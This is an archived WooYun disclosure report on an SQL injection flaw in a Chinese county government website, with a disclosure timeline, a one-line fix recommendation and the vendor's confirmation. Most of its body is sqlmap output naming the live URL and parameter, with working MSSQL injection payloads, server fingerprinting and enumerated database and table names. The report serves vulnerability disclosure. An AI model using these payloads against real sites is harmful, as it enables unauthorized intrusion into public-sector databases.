漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-050764
漏洞标题:衡南某政府网站SQL注册漏
相关厂商:衡南某政府网
漏洞作者: 路人甲
提交时间:2014-02-12 18:54
修复时间:2014-03-29 18:55
公开时间:2014-03-29 18:55
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-02-12: 细节已通知厂商并且等待厂商处理中
2014-02-17: 厂商已经确认,细节仅向厂商公开
2014-02-27: 细节向核心白帽子及相关领域专家公开
2014-03-09: 细节向普通白帽子公开
2014-03-19: 细节向实习白帽子公开
2014-03-29: 细节向公众公开
简要描述:
SQL注入漏洞,暴库暴表
详细说明:
注入点:http://www.hengnan.gov.cn/sssweb/DirectoryPublic/main.aspx?DeptID=DA0011
-不脱库,未做更深入尝试
-------------------------------------------------------------------
sqlmap identified the following injection points with a total of 38 HTTP(s) requests:
---
Place: GET
Parameter: DeptID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: DeptID=DA0011' AND 5904=5904 AND 'VsBm'='VsBm
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: DeptID=DA0011' AND 4497=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4497=4497) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(114)+CHAR(122)+CHAR(117)+CHAR(113))) AND 'vkzy'='vkzy
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: DeptID=DA0011'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: DeptID=DA0011' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Mud
[*] ReportServer
[*] ReportServerTempDB
[*] SAPP
[*] sappbak
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: DeptID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: DeptID=DA0011' AND 5904=5904 AND 'VsBm'='VsBm
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: DeptID=DA0011' AND 4497=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4497=4497) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(114)+CHAR(122)+CHAR(117)+CHAR(113))) AND 'vkzy'='vkzy
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: DeptID=DA0011'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: DeptID=DA0011' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: SAPP
[507 tables]
+-------------------------------------------------+
| SSSUSER.Bbs_online |
| SSSUSER.CommentStasticView |
| SSSUSER.D99_Tmp |
| SSSUSER.ENCR_OPDATA |
| SSSUSER.TAPP_20077119810 |
| SSSUSER.TAPP_20081111153537 |
| SSSUSER.TAPP_ADVICE_QUESTION |
| SSSUSER.TAPP_APPEAL |
| SSSUSER.TAPP_APPEAL_CONTENT |
| SSSUSER.TAPP_APPEAL_DETAIL |
| SSSUSER.TAPP_ASSESS_DEPT_CLASSIFY |
| SSSUSER.TAPP_ASSESS_DEPT_ITEMS |
| SSSUSER.TAPP_ASSESS_DEPT_MONTH |
| SSSUSER.TAPP_ASSESS_MANAGER_ITEM |
| SSSUSER.TAPP_ASSESS_USER_CLASSIFY |
| SSSUSER.TAPP_ASSESS_USER_ITEMS |
| SSSUSER.TAPP_ASSESS_USER_MONTH |
| SSSUSER.TAPP_Appraisals |
| SSSUSER.TAPP_Appraisals_Answer |
| SSSUSER.TAPP_Appraisals_Choices |
| SSSUSER.TAPP_Appraisals_Item |
| SSSUSER.TAPP_Appraisals_Question |
| SSSUSER.TAPP_CHECKITEM_LIST |
| SSSUSER.TAPP_CHECKITEM_LIST_REF |
| SSSUSER.TAPP_CHECKITEM_TABLE |
| SSSUSER.TAPP_CHECKITEM_TABLE_REF |
| SSSUSER.TAPP_COMMENT_LIST |
| SSSUSER.TAPP_COMMENT_LIST_REF |
| SSSUSER.TAPP_COMMUNION_INFO |
| SSSUSER.TAPP_COMMUNION_INFO_REF |
| SSSUSER.TAPP_DEPARTREF_LIST |
| SSSUSER.TAPP_DEPARTREF_LIST_REF |
| SSSUSER.TAPP_DICTIONARY |
| SSSUSER.TAPP_DUTY_LOG |
| SSSUSER.TAPP_DUTY_LOG_REF |
| SSSUSER.TAPP_DZJC |
| SSSUSER.TAPP_DZJC_REF |
| SSSUSER.TAPP_EFFICACY_MAIL |
| SSSUSER.TAPP_EFFICACY_MAIL_REF |
| SSSUSER.TAPP_FAQ_LIST |
| SSSUSER.TAPP_FAQ_LIST_REF |
| SSSUSER.TAPP_GUIDE |
| SSSUSER.TAPP_GUIDE_REF |
| SSSUSER.TAPP_HNXMH_INFO |
| SSSUSER.TAPP_HNXMH_INFO_REF |
| SSSUSER.TAPP_HNXMH_INFO_REF_bk200812151229_ywpx |
| SSSUSER.TAPP_HNXMH_INFO_REF_bk_ypx |
| SSSUSER.TAPP_Information_Public |
| SSSUSER.TAPP_MAINTENANCE_MATTER |
| SSSUSER.TAPP_MAINTENANCE_MATTER_REF |
| SSSUSER.TAPP_OPEN_INDEX |
| SSSUSER.TAPP_OPEN_INDEX_REF |
| SSSUSER.TAPP_OPEN_SENDER |
| SSSUSER.TAPP_PRINTER_FORM |
| SSSUSER.TAPP_PROVISIONS_LIST |
| SSSUSER.TAPP_PROVISIONS_LIST_REF |
| SSSUSER.TAPP_PUBLICSUGGESTION |
| SSSUSER.TAPP_PUBLICSUGGESTION_REF |
| SSSUSER.TAPP_Personalization_Tab |
| SSSUSER.TAPP_STATIC_DATA |
| SSSUSER.TAPP_SUBSCRIBE |
| SSSUSER.TAPP_SUBSCRIBE_COLUMN |
| SSSUSER.TAPP_SUGGESTION_ITEM |
| SSSUSER.TAPP_SUGGESTION_ITEM_REF |
| SSSUSER.TAPP_WORKGUIDE |
| SSSUSER.TAPP_WORKGUIDE_REF |
| SSSUSER.TJOL_DETAIL |
| SSSUSER.TJOL_DETAIL_REF |
| SSSUSER.TJOL_FIELD |
| SSSUSER.TJOL_FIELD_REF |
| SSSUSER.TJOL_GRADESTD |
| SSSUSER.TJOL_GRADESTD_REF |
| SSSUSER.TJOL_JOURNAL |
| SSSUSER.TJOL_JOURNAL_REF |
| SSSUSER.TJOL_JOURNAL_STUFF |
| SSSUSER.TJOL_JOURNAL_UNDERTAKER |
| SSSUSER.TJOL_ORGAN_SORT |
| SSSUSER.TJOL_ORGAN_SORT_TMP |
| SSSUSER.TJOL_STUFF |
| SSSUSER.TJOL_STUFF_GRADE |
| SSSUSER.TJOL_STUFF_GRADE_REF |
| SSSUSER.TJOL_STUFF_RECIPIENT |
| SSSUSER.TJOL_STUFF_REF |
| SSSUSER.TJOL_TEMPLATE |
| SSSUSER.TJOL_TYPE |
| SSSUSER.TJOL_TYPE_REF |
| SSSUSER.TOPR_MODULE |
| SSSUSER.TOPR_MODULE_OBJECT |
| SSSUSER.TOPR_MODULE_OBJECT_OPERATE |
| SSSUSER.TOPR_OBJECT |
| SSSUSER.TOPR_OPERATE |
| SSSUSER.TOPR_OPERATE_LOG |
| SSSUSER.TVPP_ADVICE_COUNT |
| SSSUSER.Tapp_Advice_Question_REF |
| SSSUSER.VAPP_ASSESS_MANAGER_ITEM |
| SSSUSER.VAPP_Appraisals |
| SSSUSER.VAPP_GETGRANTEDFOLDERBYROLE |
| SSSUSER.VAPP_Information_Public |
| SSSUSER.VIEW_STATIC_BMDT_DETAIL |
| SSSUSER.VIEW_STATIC_BMDT_LIST |
| SSSUSER.VIEW_STATIC_MTZH_DETAIL |
| SSSUSER.VIEW_STATIC_MTZH_LIST |
| SSSUSER.VIEW_STATIC_WJGG_DETAIL |
| SSSUSER.VIEW_STATIC_WJGG_LIST |
| SSSUSER.VIEW_STATIC_ZFWJ_DETAIL |
| SSSUSER.VIEW_STATIC_ZFWJ_LIST |
| SSSUSER.VIEW_STATIC_ZWDT_DETAIL |
| SSSUSER.VIEW_STATIC_ZWDT_LIST |
| SSSUSER.VIEW_STATIC_ZXWJ_DETAIL |
| SSSUSER.VIEW_STATIC_ZXWJ_LIST |
| SSSUSER.VJOL_DETAIL |
| SSSUSER.VJOL_FIELD |
| SSSUSER.VJOL_GRADESTD |
| SSSUSER.VJOL_JOURNAL |
| SSSUSER.VJOL_JOURNAL_STUFF |
| SSSUSER.VJOL_STUFF |
| SSSUSER.VJOL_STUFF_DETAIL |
| SSSUSER.VJOL_STUFF_STD_REPORT |
| SSSUSER.VJOL_TEMPLATE |
| SSSUSER.VJOL_TYPE |
| SSSUSER.VOPR_MODULE_OBJECT_OPERATE |
| SSSUSER.Vapp_CheckItem |
| SSSUSER.companyInfo |
| SSSUSER.countAllPage |
| SSSUSER.countDay |
| SSSUSER.countDayList |
| SSSUSER.member |
| SSSUSER.memberInfo |
| SSSUSER.tapp_Image_News |
| SSSUSER.tapp_Role_Dept |
| SSSUSER.tapp_SuggestionManagement_Suggestion |
| SSSUSER.tapp_category_template |
| SSSUSER.tapp_column |
| SSSUSER.tapp_column_template |
| SSSUSER.tapp_comment |
| SSSUSER.tapp_info_exchange |
| SSSUSER.tapp_personal_group |
| SSSUSER.tapp_personal_module |
| SSSUSER.tapp_personal_user_module |
| SSSUSER.tapp_publish_history |
| SSSUSER.tapp_publish_items |
| SSSUSER.tapp_publish_setting |
| SSSUSER.tapp_reference_article |
| SSSUSER.tapp_relactive_article |
| SSSUSER.tapp_resource |
| SSSUSER.tapp_schema |
| SSSUSER.tapp_schema_button |
| SSSUSER.tapp_website |
| SSSUSER.tblTestNull |
| SSSUSER.tbl_foldermanager |
| SSSUSER.vapp_advice_question |
| SSSUSER.vapp_category_template |
| SSSUSER.vapp_column |
| SSSUSER.vapp_column_template |
| SSSUSER.vapp_open |
| SSSUSER.vapp_schema |
| SSSUSER.vapp_suggest_check_list |
| SSSUSER.vapp_suggestion_history |
| SSSUSER.vapp_suggestion_newlist |
| SSSUSER.vjjsp_flow_message |
| AIP_DOC |
| AIP_LOGIN_SESSION |
| AIP_SEAL |
| AIP_SEALLOCATE |
| AIP_SESSION |
| AIP_USER |
| AIP_USER_CERT |
| AIP_USER_SEAL |
| Bbs_admingroups |
| Bbs_adminvisitlog |
| Bbs_advertisements |
| Bbs_announcements |
| Bbs_attachments |
| Bbs_attachtypes |
| Bbs_bbcodes |
| Bbs_creditslog |
| Bbs_failedlogins |
| Bbs_favorites |
| Bbs_forumfields |
| Bbs_forumlinks |
| Bbs_forums |
| Bbs_medals |
| Bbs_medalslog |
| Bbs_moderatormanagelog |
| Bbs_moderators |
| Bbs_onlinelist |
| Bbs_paymentlog |
| Bbs_pms |
| Bbs_polls |
| Bbs_postid |
| Bbs_posts1 |
| Bbs_ratelog |
| Bbs_searchcaches |
| Bbs_smilies |
| Bbs_statistics |
| Bbs_tablelist |
| Bbs_templates |
| Bbs_topics |
| Bbs_userfields |
| Bbs_usergroups |
| Bbs_users |
| Bbs_words |
| ColumnMap |
| TAIPUSER |
| TAPP_ACCOUNT |
| TAPP_BUSINESS_NOTICE |
| TAPP_CALENDAR |
| TAPP_CATEGORY |
| TAPP_CATEGORY_ITEM |
| TAPP_CATEGORY_PROTOCOL |
| TAPP_CATEGORY_RELATION |
| TAPP_CODER |
| TAPP_CODER_GROUP |
| TAPP_CODER_NODE |
| TAPP_CODER_NODE_SEQUENCE_NO |
| TAPP_CONDITION_ITEM |
| TAPP_COND_OBJ |
| TAPP_DATA_DICT |
| TAPP_DATA_DICT_ITEM |
| TAPP_DAY |
| TAPP_DEPT |
| TAPP_DEPT_ROLE |
| TAPP_DEPT_USER |
| TAPP_DISPATCH_RULE |
| TAPP_DISPLAY_FORMAT |
| TAPP_DOCUMENT |
| TAPP_DOCUMENT_EXCHANGE |
| TAPP_DOCUMENT_MESSAGE |
| TAPP_EXCH_REQUEST |
| TAPP_EXCH_REQUEST_FEEDBACK |
| TAPP_EXCH_REQUEST_MSG |
| TAPP_EXCH_RESPONSE |
| TAPP_EXCH_RESPONSE_MSG |
| TAPP_EXCH_TRIGGER |
| TAPP_FIELD |
| TAPP_FIELD_DEFAULT |
| TAPP_FILE |
| TAPP_FILE_CONTENT |
| TAPP_FILE_REFERENCE |
| TAPP_FK |
| TAPP_FK_FIELD |
| TAPP_FOLDER |
| TAPP_FOLDER_BUTTON |
| TAPP_FOLDER_GRID |
| TAPP_FOLDER_MANAGER |
| TAPP_FOLDER_URL |
| TAPP_FORM |
| TAPP_ID_MAKER |
| TAPP_INFO_FILE |
| TAPP_LEADER_ASSIGN |
| TAPP_LEADER_ASSIGN_REF |
| TAPP_LINKMAN |
| TAPP_LINKMANGROUP |
| TAPP_MAIL |
| TAPP_MAIL_AGENT |
| TAPP_MAIL_CONTACT |
| TAPP_MAIL_MESSAGE |
| TAPP_MAIL_RECIPIENT |
| TAPP_MEET |
| TAPP_MEET_REF |
| TAPP_MEET_SUBJECT |
| TAPP_MEET_SUBJECT_REF |
| TAPP_NODE_TYPE |
| TAPP_OBJ_OPERATION |
| TAPP_OBJ_TYPE |
| TAPP_ORGAN |
| TAPP_ORGAN_GROUP |
| TAPP_ORGAN_GROUP_MEMBER |
| TAPP_ORGAN_REF |
| TAPP_QUERY |
| TAPP_QUERY_FIELD |
| TAPP_QUERY_RELATION |
| TAPP_QUERY_RELATION_1 |
| TAPP_QUERY_RELATION_FIELD |
| TAPP_QUERY_RELATION_FIELD_1 |
| TAPP_QUESTIONDEAL |
| TAPP_QUESTION_DEAL |
| TAPP_QUESTION_DEAL_REF |
| TAPP_RESOLUTION |
| TAPP_ROLE |
| TAPP_ROLE_ALL_USER |
| TAPP_ROLE_GROUP |
| TAPP_ROLE_OBJ_PRIV |
| TAPP_SEAL |
| TAPP_SEQUENCE_NO |
| TAPP_SESSION |
| TAPP_SYS_PARAM |
| TAPP_TABLE |
| TAPP_TMP_DEPT |
| TAPP_USER |
| TAPP_USER_CERT |
| TAPP_USER_OBJ_PRIV |
| TAPP_USER_ROLE |
| TAPP_WEEK_DAY |
| TCSC_ACCOUNT |
| TCSC_ADMIN_USER |
| TCSC_DEPT |
| TCSC_DEPT_USER |
| TCSC_ID_MAKER |
| TCSC_MODULE |
| TCSC_ORGAN |
| TCSC_ORGAN_USER |
| TCSC_PROTOCOL |
| TCSC_PUBLISH |
| TCSC_PUBLISH_CONTENT |
| TCSC_PUBLISH_MESSAGE |
| TCSC_PUBLISH_MODULE |
| TCSC_SERVER |
| TCSC_SERVER_LINK |
| TCSC_SERVER_ORGAN |
| TCSC_SESSION |
| TCSC_SUBSCRIBE |
| TCSC_SUBSCRIBE_MESSAGE |
| TCSC_SUBSCRIBE_MODULE |
| TCSC_USER |
| THYSP_BJDJB |
| THYSP_BJDJB_REF |
| TICP_ADAPTER |
| TICP_ADAPTER_METHOD |
| TICP_ADAPTER_PROTOCOL |
| TICP_ADAPTER_WEBSERVICE |
| TICP_ADMIN_USER |
| TICP_ATTACHMENT |
| TICP_ATTACH_CONTENT |
| TICP_EVENT_DICT |
| TICP_EVENT_LOG |
| TICP_ID_MAKER |
| TICP_MESSAGE |
| TICP_MESSAGE_EVENT |
| TICP_MESSAGE_EXCHANGE |
| TICP_RECV_EXCHANGE |
| TICP_RECV_FEEDBACK |
| TICP_RECV_QUEUE |
| TICP_SEND_EXCHANGE |
| TICP_SEND_FEEDBACK |
| TICP_SEND_QUEUE |
| TICP_SYS_PARAMETER |
| TICP_TRANSFER_EXCHANGE |
| TICP_TRANSFER_FEEDBACK |
| TICP_TRANSFER_QUEUE |
| TICP_WEBSERVICE |
| TICP_WEBSERVICE_ORGAN |
| TICP_XML_FILE |
| TJJSP_BBJL |
| TJJSP_BJTJ |
| TJJSP_ZXSPBD |
| TJJSP_ZXSPBD_REF |
| TWKF_AGENT |
| TWKF_FIELD_MAPPING |
| TWKF_FLOW_ACTOR |
| TWKF_FLOW_ALERT |
| TWKF_FLOW_INSTANCE |
| TWKF_FLOW_MODEL |
| TWKF_FLOW_MODEL_ORDER |
| TWKF_FLOW_NOTICE |
| TWKF_FLOW_PAUSE_TIME |
| TWKF_FORM_DATA |
| TWKF_LINK_EXP |
| TWKF_MESSAGE |
| TWKF_MESSAGE_ACTION |
| TWKF_MESSAGE_LINK |
| TWKF_MESSAGE_RECIPIENTS |
| TWKF_MESSAGE_SIGN |
| TWKF_MODEL_ACTION_GROUP |
| TWKF_MODEL_FILE_SETTING |
| TWKF_MODEL_LINK |
| TWKF_MODEL_NODE |
| TWKF_MODEL_NODE_ACTION |
| TWKF_MODEL_NODE_FIELD |
| TWKF_NODE_FILE_SETTING |
| TWKF_OPINION |
| TWKF_RELATIVE_INSTANCE |
| TWKF_SEND_FILL_FIELD |
| TWKF_SHOW_FORM_SETTING |
| TWKF_SUBFLOW_SETTING |
| VAPP_BUSINESS_NOTICE |
| VAPP_CATEGORY_PROTOCOL |
| VAPP_CONDITION_ITEM |
| VAPP_DAY |
| VAPP_DEPT_USER |
| VAPP_DEPT_USERNAME |
| VAPP_DICT |
| VAPP_DICT_ITEM |
| VAPP_DISPLAY_FORMAT |
| VAPP_DOCUMENT |
| VAPP_DOCUMENT_EXCHANGE |
| VAPP_DOCUMENT_EXCHANGED |
| VAPP_DOCUMENT_EXCHANGE_DETAIL |
| VAPP_DOCUMENT_EXCHANGE_DETAIL1 |
| VAPP_DOCUMENT_EXCHANGE_OLD |
| VAPP_DOCUMENT_LIST |
| VAPP_DOCUMENT_OLD |
| VAPP_DOC_MSG_STATISTIC |
| VAPP_FILE |
| VAPP_FILE_REFERENCE |
| VAPP_FOLDER |
| VAPP_FORM |
| VAPP_GETALLPRIVBYROLE |
| VAPP_GETALLPRIVBYUSER |
| VAPP_GETCODENODEBYSEQUENCEID |
| VAPP_GETDEPTBYROLEID |
| VAPP_GETDEPTBYUSERID |
| VAPP_GETFIELDS_BYTABLENAME |
| VAPP_GETFIELD_DATATYPE |
| VAPP_GETFOLDERBYROLE |
| VAPP_GETFOLDERBYUSER |
| VAPP_GETQUERYS_BYCATEGORYID |
| VAPP_GETROLEBYDEPTID |
| VAPP_GETROLEBYPRIVOBJ |
| VAPP_GETROLEBYUSERID |
| VAPP_GETROLEOBJPRIVBYUSERID |
| VAPP_GETSEQUENCENOBYCODENODE |
| VAPP_GETTABLES_BYCATEGORYID |
| VAPP_GETUSERBYDEPTID |
| VAPP_GETUSERBYPRIVOBJ |
| VAPP_GETUSERBYROLE |
| VAPP_GETUSERBYROLEID |
| VAPP_GETUSERFOLDERBYROLE |
| VAPP_GETUSERFOLDERBYUSER |
| VAPP_INFO_FILE |
| VAPP_MAIL |
| VAPP_MEET_SUBJECT |
| VAPP_METADATA_OBJECT |
| VAPP_METADATA_OBJECT_FIELD |
| VAPP_ORGAN_GROUP |
| VAPP_ORGAN_USER |
| VAPP_SESSION |
| VAPP_USER |
| VAPP_USER_LIST |
| VAPP_USER_MAIN_DEPT |
| VAPP_WEEKDAY |
| VCSC_GETDEPTBYUSERID |
| VCSC_GETUSERBYDEPTID |
| VCSC_PUBLISH_MODULE |
| VCSC_SUBSCRIBE_MODULE |
| VCSC_USER |
| VJJSP_ECSJ |
| VJJSP_LCSL |
| VJJSP_LCSL_SEGMENT_OVERTIME |
| VJJSP_LCSL_TOTAL_OVERTIME |
| VWKF_AGENT |
| VWKF_FIELDMAPPING |
| VWKF_FIELDPRIVILEGE |
| VWKF_FLOW_INSTANCE |
| VWKF_FLOW_MODEL |
| VWKF_FLOW_NOTICE |
| VWKF_GETFLOWMDLS_BYSTARTACTOR |
| VWKF_INSTANCE_ALERT |
| VWKF_INST_FORM_DATA |
| VWKF_INST_NEXT_MESSAGE |
| VWKF_INST_PREVIOUS_MESSAGE |
| VWKF_MESSAGE |
| VWKF_MESSAGE_ALERT |
| VWKF_MESSAGE_LEAVE_ACTION |
| VWKF_MESSAGE_LIST |
| VWKF_MESSAGE_NEW |
| VWKF_MESSAGE_OLD |
| VWKF_MODEL_NEXT_NODE |
| VWKF_MODEL_PREVIOUS_NODE |
| VWKF_MSG_FORM_DATA |
| VWKF_RELATIVE_INSTANCE |
| VWKF_SENDFILLFIELD |
| VWKF_WAITING_MSG_FORM_DATA |
| dtproperties |
| sysdiagrams |
| tapp_Log |
| thy_vote |
| thy_vote_ballot |
| thy_vote_option |
| thy_vote_option_append |
| thy_vote_question |
| thy_vote_questionnaire |
| vicp_adapter |
| vicp_adapter_method |
| vicp_adapter_methodx |
| vicp_adapter_protocol |
| vicp_adapter_webservice |
| vicp_adapter_webservice_organ |
| vicp_admin_user |
| vicp_attach_content |
| vicp_attachment |
| vicp_console_log |
| vicp_console_message |
| vicp_console_receive |
| vicp_console_send |
| vicp_console_trans |
| vicp_event_log |
| vicp_message |
| vicp_message_exchange |
| vicp_queue_feedback |
| vicp_recv_exchange |
| vicp_recv_feedback |
| vicp_recv_feedback_webservice |
| vicp_recv_queue |
| vicp_recv_queue_webservice |
| vicp_recv_queuex |
| vicp_send_exchange |
| vicp_send_feedback |
| vicp_send_queue |
| vicp_send_queuex |
| vicp_sys_parameter |
| vicp_transfer_exchange |
| vicp_transfer_feedback |
| vicp_transfer_queue |
| vicp_transfer_queuex |
| vicp_xml_file |
| vjjsp_all_bj |
+-------------------------------------------------+
漏洞证明:
修复方案:
严格输入字符过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-02-17 09:14
厂商回复:
最新状态:
暂无